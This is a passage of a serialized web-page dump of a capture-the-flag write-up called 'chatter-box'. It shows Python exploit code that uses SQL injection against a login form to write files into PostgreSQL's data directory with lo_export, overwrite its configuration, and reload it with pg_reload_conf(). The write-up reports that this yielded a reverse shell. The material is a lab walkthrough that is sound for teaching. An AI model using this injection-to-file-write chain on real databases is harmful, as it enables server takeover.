'/etc/postgresql/13/main/postgresql.conf'))\"",{"type":32,"tag":83,"props":3444,"children":3445},{"style":433},[3446],{"type":38,"value":798},{"type":32,"tag":83,"props":3448,"children":3449},{"class":85,"line":183},[3450,3454,3458,3462,3466,3470,3474,3478,3482,3486,3490,3494,3498,3502,3506,3510,3514,3518,3522,3526,3530,3534,3538,3542],{"type":32,"tag":83,"props":3451,"children":3452},{"style":96},[3453],{"type":38,"value":3297},{"type":32,"tag":83,"props":3455,"children":3456},{"style":433},[3457],{"type":38,"value":607},{"type":32,"tag":83,"props":3459,"children":3460},{"style":96},[3461],{"type":38,"value":3306},{"type":32,"tag":83,"props":3463,"children":3464},{"style":433},[3465],{"type":38,"value":629},{"type":32,"tag":83,"props":3467,"children":3468},{"style":96},[3469],{"type":38,"value":3315},{"type":32,"tag":83,"props":3471,"children":3472},{"style":433},[3473],{"type":38,"value":584},{"type":32,"tag":83,"props":3475,"children":3476},{"style":651},[3477],{"type":38,"value":3324},{"type":32,"tag":83,"props":3479,"children":3480},{"style":433},[3481],{"type":38,"value":728},{"type":32,"tag":83,"props":3483,"children":3484},{"style":427},[3485],{"type":38,"value":3333},{"type":32,"tag":83,"props":3487,"children":3488},{"style":433},[3489],{"type":38,"value":607},{"type":32,"tag":83,"props":3491,"children":3492},{"style":439},[3493],{"type":38,"value":452},{"type":32,"tag":83,"props":3495,"children":3496},{"style":338},[3497],{"type":38,"value":3346},{"type":32,"tag":83,"props":3499,"children":3500},{"style":439},[3501],{"type":38,"value":452},{"type":32,"tag":83,"props":3503,"children":3504},{"style":455},[3505],{"type":38,"value":468},{"type":32,"tag":83,"props":3507,"children":3508},{"style":96},[3509],{"type":38,"value":589},{"type":32,"tag":83,"props":3511,"children":3512},{"style":455},[3513],{"type":38,"value":468},{"type":32,"tag":83,"props":3515,"children":3516},{"style":439},[3517],{"type":38,"value":452},{"type":32,"tag":83,"props":3519,"children":3
520},{"style":338},[3521],{"type":38,"value":3371},{"type":32,"tag":83,"props":3523,"children":3524},{"style":439},[3525],{"type":38,"value":452},{"type":32,"tag":83,"props":3527,"children":3528},{"style":433},[3529],{"type":38,"value":728},{"type":32,"tag":83,"props":3531,"children":3532},{"style":427},[3533],{"type":38,"value":3384},{"type":32,"tag":83,"props":3535,"children":3536},{"style":433},[3537],{"type":38,"value":607},{"type":32,"tag":83,"props":3539,"children":3540},{"style":96},[3541],{"type":38,"value":3393},{"type":32,"tag":83,"props":3543,"children":3544},{"style":433},[3545],{"type":38,"value":798},{"type":32,"tag":364,"props":3547,"children":3548},{},[3549],{"type":32,"tag":368,"props":3550,"children":3551},{},[3552],{"type":38,"value":3553},"Replace the PG_VERSION file with our key:",{"type":32,"tag":68,"props":3555,"children":3556},{"lang":556},[3557],{"type":32,"tag":73,"props":3558,"children":3560},{"code":3559,"language":556,"meta":7,"className":561,"style":7},"rand_num = rand_num + 1\nwith open(\"files/cert.b64\", \"r\") as f:\n    cert = f.read()\n\nquery = get_payload(f\"(SELECT lo_from_bytea({rand_num}, decode('{cert}', 'base64')))\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\nquery = get_payload(f\"(SELECT lo_export({rand_num}, '/var/lib/postgresql/13/main/PG_VERSION'))\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\n",[3561],{"type":32,"tag":79,"props":3562,"children":3563},{"__ignoreMap":7},[3564,3589,3649,3677,3684,3748,3847,3895],{"type":32,"tag":83,"props":3565,"children":3566},{"class":85,"line":86},[3567,3571,3575,3580,3584],{"type":32,"tag":83,"props":3568,"children":3569},{"style":96},[3570],{"type":38,"value":3061},{"type":32,"tag":83,"props":3572,"children":3573},{"style":433},[3574],{"type":38,"value":607},{"type":32,"tag":83,"props":3576,"children":3577},{"style":96},[3578],{"type":38,"value":3579}," rand_num 
",{"type":32,"tag":83,"props":3581,"children":3582},{"style":455},[3583],{"type":38,"value":468},{"type":32,"tag":83,"props":3585,"children":3586},{"style":720},[3587],{"type":38,"value":3588}," 1\n",{"type":32,"tag":83,"props":3590,"children":3591},{"class":85,"line":102},[3592,3596,3600,3604,3608,3613,3617,3621,3625,3629,3633,3637,3641,3645],{"type":32,"tag":83,"props":3593,"children":3594},{"style":90},[3595],{"type":38,"value":3127},{"type":32,"tag":83,"props":3597,"children":3598},{"style":657},[3599],{"type":38,"value":3132},{"type":32,"tag":83,"props":3601,"children":3602},{"style":433},[3603],{"type":38,"value":584},{"type":32,"tag":83,"props":3605,"children":3606},{"style":439},[3607],{"type":38,"value":452},{"type":32,"tag":83,"props":3609,"children":3610},{"style":338},[3611],{"type":38,"value":3612},"files/cert.b64",{"type":32,"tag":83,"props":3614,"children":3615},{"style":439},[3616],{"type":38,"value":452},{"type":32,"tag":83,"props":3618,"children":3619},{"style":433},[3620],{"type":38,"value":728},{"type":32,"tag":83,"props":3622,"children":3623},{"style":439},[3624],{"type":38,"value":442},{"type":32,"tag":83,"props":3626,"children":3627},{"style":338},[3628],{"type":38,"value":3162},{"type":32,"tag":83,"props":3630,"children":3631},{"style":439},[3632],{"type":38,"value":452},{"type":32,"tag":83,"props":3634,"children":3635},{"style":433},[3636],{"type":38,"value":869},{"type":32,"tag":83,"props":3638,"children":3639},{"style":90},[3640],{"type":38,"value":3175},{"type":32,"tag":83,"props":3642,"children":3643},{"style":96},[3644],{"type":38,"value":2891},{"type":32,"tag":83,"props":3646,"children":3647},{"style":433},[3648],{"type":38,"value":3184},{"type":32,"tag":83,"props":3650,"children":3651},{"class":85,"line":112},[3652,3657,3661,3665,3669,3673],{"type":32,"tag":83,"props":3653,"children":3654},{"style":96},[3655],{"type":38,"value":3656},"    cert 
",{"type":32,"tag":83,"props":3658,"children":3659},{"style":433},[3660],{"type":38,"value":607},{"type":32,"tag":83,"props":3662,"children":3663},{"style":96},[3664],{"type":38,"value":2891},{"type":32,"tag":83,"props":3666,"children":3667},{"style":433},[3668],{"type":38,"value":629},{"type":32,"tag":83,"props":3670,"children":3671},{"style":96},[3672],{"type":38,"value":3209},{"type":32,"tag":83,"props":3674,"children":3675},{"style":433},[3676],{"type":38,"value":3214},{"type":32,"tag":83,"props":3678,"children":3679},{"class":85,"line":126},[3680],{"type":32,"tag":83,"props":3681,"children":3682},{"emptyLinePlaceholder":106},[3683],{"type":38,"value":109},{"type":32,"tag":83,"props":3685,"children":3686},{"class":85,"line":135},[3687,3691,3695,3699,3703,3707,3711,3715,3719,3723,3727,3731,3736,3740,3744],{"type":32,"tag":83,"props":3688,"children":3689},{"style":96},[3690],{"type":38,"value":3229},{"type":32,"tag":83,"props":3692,"children":3693},{"style":433},[3694],{"type":38,"value":607},{"type":32,"tag":83,"props":3696,"children":3697},{"style":96},[3698],{"type":38,"value":579},{"type":32,"tag":83,"props":3700,"children":3701},{"style":433},[3702],{"type":38,"value":584},{"type":32,"tag":83,"props":3704,"children":3705},{"style":455},[3706],{"type":38,"value":643},{"type":32,"tag":83,"props":3708,"children":3709},{"style":338},[3710],{"type":38,"value":3250},{"type":32,"tag":83,"props":3712,"children":3713},{"style":651},[3714],{"type":38,"value":654},{"type":32,"tag":83,"props":3716,"children":3717},{"style":96},[3718],{"type":38,"value":3259},{"type":32,"tag":83,"props":3720,"children":3721},{"style":651},[3722],{"type":38,"value":688},{"type":32,"tag":83,"props":3724,"children":3725},{"style":338},[3726],{"type":38,"value":3268},{"type":32,"tag":83,"props":3728,"children":3729},{"style":651},[3730],{"type":38,"value":654},{"type":32,"tag":83,"props":3732,"children":3733},{"style":96},[3734],{"type":38,"value":3735},"cert",{"type":32,"tag":83,"props":3737
,"children":3738},{"style":651},[3739],{"type":38,"value":688},{"type":32,"tag":83,"props":3741,"children":3742},{"style":338},[3743],{"type":38,"value":3285},{"type":32,"tag":83,"props":3745,"children":3746},{"style":433},[3747],{"type":38,"value":798},{"type":32,"tag":83,"props":3749,"children":3750},{"class":85,"line":148},[3751,3755,3759,3763,3767,3771,3775,3779,3783,3787,3791,3795,3799,3803,3807,3811,3815,3819,3823,3827,3831,3835,3839,3843],{"type":32,"tag":83,"props":3752,"children":3753},{"style":96},[3754],{"type":38,"value":3297},{"type":32,"tag":83,"props":3756,"children":3757},{"style":433},[3758],{"type":38,"value":607},{"type":32,"tag":83,"props":3760,"children":3761},{"style":96},[3762],{"type":38,"value":3306},{"type":32,"tag":83,"props":3764,"children":3765},{"style":433},[3766],{"type":38,"value":629},{"type":32,"tag":83,"props":3768,"children":3769},{"style":96},[3770],{"type":38,"value":3315},{"type":32,"tag":83,"props":3772,"children":3773},{"style":433},[3774],{"type":38,"value":584},{"type":32,"tag":83,"props":3776,"children":3777},{"style":651},[3778],{"type":38,"value":3324},{"type":32,"tag":83,"props":3780,"children":3781},{"style":433},[3782],{"type":38,"value":728},{"type":32,"tag":83,"props":3784,"children":3785},{"style":427},[3786],{"type":38,"value":3333},{"type":32,"tag":83,"props":3788,"children":3789},{"style":433},[3790],{"type":38,"value":607},{"type":32,"tag":83,"props":3792,"children":3793},{"style":439},[3794],{"type":38,"value":452},{"type":32,"tag":83,"props":3796,"children":3797},{"style":338},[3798],{"type":38,"value":3346},{"type":32,"tag":83,"props":3800,"children":3801},{"style":439},[3802],{"type":38,"value":452},{"type":32,"tag":83,"props":3804,"children":3805},{"style":455},[3806],{"type":38,"value":468},{"type":32,"tag":83,"props":3808,"children":3809},{"style":96},[3810],{"type":38,"value":589},{"type":32,"tag":83,"props":3812,"children":3813},{"style":455},[3814],{"type":38,"value":468},{"type":32,"tag":83,"props":
3816,"children":3817},{"style":439},[3818],{"type":38,"value":452},{"type":32,"tag":83,"props":3820,"children":3821},{"style":338},[3822],{"type":38,"value":3371},{"type":32,"tag":83,"props":3824,"children":3825},{"style":439},[3826],{"type":38,"value":452},{"type":32,"tag":83,"props":3828,"children":3829},{"style":433},[3830],{"type":38,"value":728},{"type":32,"tag":83,"props":3832,"children":3833},{"style":427},[3834],{"type":38,"value":3384},{"type":32,"tag":83,"props":3836,"children":3837},{"style":433},[3838],{"type":38,"value":607},{"type":32,"tag":83,"props":3840,"children":3841},{"style":96},[3842],{"type":38,"value":3393},{"type":32,"tag":83,"props":3844,"children":3845},{"style":433},[3846],{"type":38,"value":798},{"type":32,"tag":83,"props":3848,"children":3849},{"class":85,"line":161},[3850,3854,3858,3862,3866,3870,3874,3878,3882,3886,3891],{"type":32,"tag":83,"props":3851,"children":3852},{"style":96},[3853],{"type":38,"value":3229},{"type":32,"tag":83,"props":3855,"children":3856},{"style":433},[3857],{"type":38,"value":607},{"type":32,"tag":83,"props":3859,"children":3860},{"style":96},[3861],{"type":38,"value":579},{"type":32,"tag":83,"props":3863,"children":3864},{"style":433},[3865],{"type":38,"value":584},{"type":32,"tag":83,"props":3867,"children":3868},{"style":455},[3869],{"type":38,"value":643},{"type":32,"tag":83,"props":3871,"children":3872},{"style":338},[3873],{"type":38,"value":3425},{"type":32,"tag":83,"props":3875,"children":3876},{"style":651},[3877],{"type":38,"value":654},{"type":32,"tag":83,"props":3879,"children":3880},{"style":96},[3881],{"type":38,"value":3259},{"type":32,"tag":83,"props":3883,"children":3884},{"style":651},[3885],{"type":38,"value":688},{"type":32,"tag":83,"props":3887,"children":3888},{"style":338},[3889],{"type":38,"value":3890},", 
'/var/lib/postgresql/13/main/PG_VERSION'))\"",{"type":32,"tag":83,"props":3892,"children":3893},{"style":433},[3894],{"type":38,"value":798},{"type":32,"tag":83,"props":3896,"children":3897},{"class":85,"line":169},[3898,3902,3906,3910,3914,3918,3922,3926,3930,3934,3938,3942,3946,3950,3954,3958,3962,3966,3970,3974,3978,3982,3986,3990],{"type":32,"tag":83,"props":3899,"children":3900},{"style":96},[3901],{"type":38,"value":3297},{"type":32,"tag":83,"props":3903,"children":3904},{"style":433},[3905],{"type":38,"value":607},{"type":32,"tag":83,"props":3907,"children":3908},{"style":96},[3909],{"type":38,"value":3306},{"type":32,"tag":83,"props":3911,"children":3912},{"style":433},[3913],{"type":38,"value":629},{"type":32,"tag":83,"props":3915,"children":3916},{"style":96},[3917],{"type":38,"value":3315},{"type":32,"tag":83,"props":3919,"children":3920},{"style":433},[3921],{"type":38,"value":584},{"type":32,"tag":83,"props":3923,"children":3924},{"style":651},[3925],{"type":38,"value":3324},{"type":32,"tag":83,"props":3927,"children":3928},{"style":433},[3929],{"type":38,"value":728},{"type":32,"tag":83,"props":3931,"children":3932},{"style":427},[3933],{"type":38,"value":3333},{"type":32,"tag":83,"props":3935,"children":3936},{"style":433},[3937],{"type":38,"value":607},{"type":32,"tag":83,"props":3939,"children":3940},{"style":439},[3941],{"type":38,"value":452},{"type":32,"tag":83,"props":3943,"children":3944},{"style":338},[3945],{"type":38,"value":3346},{"type":32,"tag":83,"props":3947,"children":3948},{"style":439},[3949],{"type":38,"value":452},{"type":32,"tag":83,"props":3951,"children":3952},{"style":455},[3953],{"type":38,"value":468},{"type":32,"tag":83,"props":3955,"children":3956},{"style":96},[3957],{"type":38,"value":589},{"type":32,"tag":83,"props":3959,"children":3960},{"style":455},[3961],{"type":38,"value":468},{"type":32,"tag":83,"props":3963,"children":3964},{"style":439},[3965],{"type":38,"value":452},{"type":32,"tag":83,"props":3967,"children":39
68},{"style":338},[3969],{"type":38,"value":3371},{"type":32,"tag":83,"props":3971,"children":3972},{"style":439},[3973],{"type":38,"value":452},{"type":32,"tag":83,"props":3975,"children":3976},{"style":433},[3977],{"type":38,"value":728},{"type":32,"tag":83,"props":3979,"children":3980},{"style":427},[3981],{"type":38,"value":3384},{"type":32,"tag":83,"props":3983,"children":3984},{"style":433},[3985],{"type":38,"value":607},{"type":32,"tag":83,"props":3987,"children":3988},{"style":96},[3989],{"type":38,"value":3393},{"type":32,"tag":83,"props":3991,"children":3992},{"style":433},[3993],{"type":38,"value":798},{"type":32,"tag":364,"props":3995,"children":3996},{},[3997],{"type":32,"tag":368,"props":3998,"children":3999},{},[4000],{"type":38,"value":4001},"Reload the PostgreSQL configuration with pg_reload_conf(), which makes the server re-read its settings without a restart:",{"type":32,"tag":68,"props":4003,"children":4004},{"lang":556},[4005],{"type":32,"tag":73,"props":4006,"children":4008},{"code":4007,"language":556,"meta":7,"className":561,"style":7},"query = get_payload(f\"SELECT pg_reload_conf()\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\n",[4009],{"type":32,"tag":79,"props":4010,"children":4011},{"__ignoreMap":7},[4012,4044],{"type":32,"tag":83,"props":4013,"children":4014},{"class":85,"line":86},[4015,4019,4023,4027,4031,4035,4040],{"type":32,"tag":83,"props":4016,"children":4017},{"style":96},[4018],{"type":38,"value":3229},{"type":32,"tag":83,"props":4020,"children":4021},{"style":433},[4022],{"type":38,"value":607},{"type":32,"tag":83,"props":4024,"children":4025},{"style":96},[4026],{"type":38,"value":579},{"type":32,"tag":83,"props":4028,"children":4029},{"style":433},[4030],{"type":38,"value":584},{"type":32,"tag":83,"props":4032,"children":4033},{"style":455},[4034],{"type":38,"value":643},{"type":32,"tag":83,"props":4036,"children":4037},{"style":338},[4038],{"type":38,"value":4039},"\"SELECT pg_reload_conf()\"",{"type":32,"tag":83,"props":4041,"children":4042},{"style":433},[4043],{"type":38,"value":798},{"type":32,"tag":83,"props":4045,"children":4046},{"class":85,"line":102},[4047,4051,4055,4059,4063,4067,4071,4075,4079,4083,4087,4091,4095,4099,4103,4107,4111,4115,4119,4123,4127,4131,4135,4139],{"type":32,"tag":83,"props":4048,"children":4049},{"style":96},[4050],{"type":38,"value":3297},{"type":32,"tag":83,"props":4052,"children":4053},{"style":433},[4054],{"type":38,"value":607},{"type":32,"tag":83,"props":4056,"children":4057},{"style":96},[4058],{"type":38,"value":3306},{"type":32,"tag":83,"props":4060,"children":4061},{"style":433},[4062],{"type":38,"value":629},{"type":32,"tag":83,"props":4064,"children":4065},{"style":96},[4066],{"type":38,"value":3315},{"type":32,"tag":83,"props":4068,"children":4069},{"style":433},[4070],{"type":38,"value":584},{"type":32,"tag":83,"props":4072,"children":4073},{"style":651},[4074],{"type":38,"value":3324},{"type":32,"tag":83,"props":4076,"children":4077},{"style":433},[4078],{"type":38,"value":728},{"type":32,"tag":83,"props":4080,"children":4081},{"style":427},[4082],{"type":38,"value":3333},{"type":32,"tag":83,"props":4084,"children":4085},{"style":433},[4086],{"type":38,"value":607},{"type":32,"tag":83,"props":4088,"children":4089},{"style":439},[4090],{"type":38,"value":452},{"type":32,"tag":83,"props":4092,"children":4093},{"style":338},[4094],{"type":38,"value":3346},{"type":32,"tag":83,"props":4096,"children":4097},{"style":439},[4098],{"type":38,"value":452},{"type":32,"tag":83,"props":4100,"children":4101},{"style":455},[4102],{"type":38,"value":468},{"type":32,"tag":83,"props":4104,"children":4105},{"style":96},[4106],{"type":38,"value":589},{"type":32,"tag":83,"props":4108,"children":4109},{"style":455},[4110],{"type":38,"value":468},{"type":32,"tag":83,"props":4112,"children":4113},{"style":439},[4114],{"type":38,"value":452},{"type":32,"tag":83,"props":4116,"children":4117},{"style":338},[4118],{
"type":38,"value":3371},{"type":32,"tag":83,"props":4120,"children":4121},{"style":439},[4122],{"type":38,"value":452},{"type":32,"tag":83,"props":4124,"children":4125},{"style":433},[4126],{"type":38,"value":728},{"type":32,"tag":83,"props":4128,"children":4129},{"style":427},[4130],{"type":38,"value":3384},{"type":32,"tag":83,"props":4132,"children":4133},{"style":433},[4134],{"type":38,"value":607},{"type":32,"tag":83,"props":4136,"children":4137},{"style":96},[4138],{"type":38,"value":3393},{"type":32,"tag":83,"props":4140,"children":4141},{"style":433},[4142],{"type":38,"value":798},{"type":32,"tag":47,"props":4144,"children":4145},{},[4146,4148,4154,4156,4162],{"type":38,"value":4147},"Note that the ",{"type":32,"tag":79,"props":4149,"children":4151},{"className":4150},[],[4152],{"type":38,"value":4153},"get_payload()",{"type":38,"value":4155}," function wraps the given query in the SQL injection payload described previously in ",{"type":32,"tag":2436,"props":4157,"children":4159},{"href":4158},"#sql-injection",[4160],{"type":38,"value":4161},"part 3",{"type":38,"value":629},{"type":32,"tag":47,"props":4164,"children":4165},{},[4166],{"type":38,"value":4167},"After reloading the configuration, we can see that the reverse shell was executed successfully, giving us command execution on the target and thus the flag.",{"type":32,"tag":57,"props":4169,"children":4171},{"imgSrc":4170},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559298/writeups/chatter-box/rev_shell.webp",[],{"type":32,"tag":4173,"props":4174,"children":4175},"style",{},[4176],{"type":38,"value":4177},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: 
var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":102,"depth":86,"links":4179},[4180,4181,4182,4183,4184],{"id":42,"depth":102,"text":45},{"id":349,"depth":102,"text":352},{"id":396,"depth":102,"text":399},{"id":2611,"depth":102,"text":2614},{"id":3027,"depth":102,"text":3030},"markdown","content:writeups:chatter-box.md","content","writeups/chatter-box.md","writeups/chatter-box","md",1749027224524]